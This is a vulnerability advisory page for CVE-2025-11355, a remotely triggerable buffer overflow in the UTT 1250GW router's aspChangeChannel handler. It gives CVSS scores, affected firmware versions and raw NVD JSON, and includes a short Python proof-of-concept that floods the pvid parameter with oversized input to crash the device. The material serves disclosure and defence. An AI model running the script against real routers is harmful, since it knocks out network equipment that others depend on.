Security Vulnerability Report
中文
CVE-2025-11355 CVSS 8.8 HIGH

CVE-2025-11355

Published: 2025-10-07 07:15:44
Last Modified: 2026-01-08 16:02:03
Source: [email protected]

Description

A vulnerability has been found in UTT 1250GW up to v2v3.2.2-200710. Affected by this vulnerability is the function strcpy of the file /goform/aspChangeChannel. The manipulation of the argument pvid leads to buffer overflow. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.

CVSS Details

CVSS Score
8.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:utt:1250gw_firmware:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:utt:1250gw:2.0:*:*:*:*:*:*:* - NOT VULNERABLE
UTT 1250GW <= v2v3.2.2-200710

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 # CVE-2025-11355 - UTT 1250GW Buffer Overflow PoC # Vulnerability: Buffer overflow in strcpy() at /goform/aspChangeChannel via pvid parameter import requests import sys TARGET_URL = "http://{}/goform/aspChangeChannel" BUFFER_SIZE = 512 # Estimated buffer size for pvid parameter def exploit(target_ip, payload_size=1024): """ Send a crafted pvid parameter to trigger buffer overflow in the aspChangeChannel endpoint of UTT 1250GW router. """ url = TARGET_URL.format(target_ip) # Construct overflow payload # Fill buffer with 'A' characters to overflow overflow_data = "A" * payload_size # Craft the POST request with malicious pvid parameter data = { "pvid": overflow_data } headers = { "Content-Type": "application/x-www-form-urlencoded", "User-Agent": "Mozilla/5.0" } try: response = requests.post(url, data=data, headers=headers, timeout=10) print(f"[*] Request sent to {url}") print(f"[*] Payload size: {payload_size} bytes") print(f"[*] Response status: {response.status_code}") print(f"[*] Response length: {len(response.content)}") # Check if the router crashed or became unresponsive if response.status_code == 500 or response.status_code == 404: print("[+] Possible crash detected - vulnerability may be triggered") return True else: print("[-] No immediate crash detected") return False except requests.exceptions.Timeout: print("[+] Timeout detected - router may have crashed!") return True except requests.exceptions.ConnectionError: print("[+] Connection error - router may be down!") return True except Exception as e: print(f"[!] Error: {e}") return False if __name__ == "__main__": if len(sys.argv) < 2: print(f"Usage: {sys.argv[0]} <target_ip> [payload_size]") print(f"Example: {sys.argv[0]} 192.168.1.1 1024") sys.exit(1) target = sys.argv[1] size = int(sys.argv[2]) if len(sys.argv) > 2 else 1024 print(f"[*] CVE-2025-11355 PoC - UTT 1250GW Buffer Overflow") print(f"[*] Target: {target}") print(f"[*] Payload size: {size}") print("-" * 50) exploit(target, size)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-11355", "sourceIdentifier": "[email protected]", "published": "2025-10-07T07:15:44.260", "lastModified": "2026-01-08T16:02:03.337", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability has been found in UTT 1250GW up to v2v3.2.2-200710. Affected by this vulnerability is the function strcpy of the file /goform/aspChangeChannel. The manipulation of the argument pvid leads to buffer overflow. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.4, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "baseScore": 9.0, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "availabilityImpact": "COMPLETE"}, "baseSeverity": "HIGH", "exploitabilityScore": 8.0, "impactScore": 10.0, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-119"}, {"lang": "en", "value": "CWE-120"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:utt:1250gw_firmware:*:*:*:*:*:*:*:*", "versionEndIncluding": "3.2.2-200710", "matchCriteriaId": "26129544-FEE2-4C29-8C44-4FDB97605BD1"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:utt:1250gw:2.0:*:*:*:*:*:*:*", "matchCriteriaId": "00AFFB53-0AA8-42E1-8B2E-109D73D1B061"}]}]}], "references": [{"url": "https://github.com/cymiao1978/cve/blob/main/10.md", "source": "[email protected]", "tags": ["Broken Link", "Exploit"]}, {"url": "https://github.com/cymiao1978/cve/blob/main/10.md#poc", "source": "[email protected]", "tags": ["Broken Link", "Exploit"]}, {"url": "https://vuldb.com/?ctiid.327240", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.327240", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.664921", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.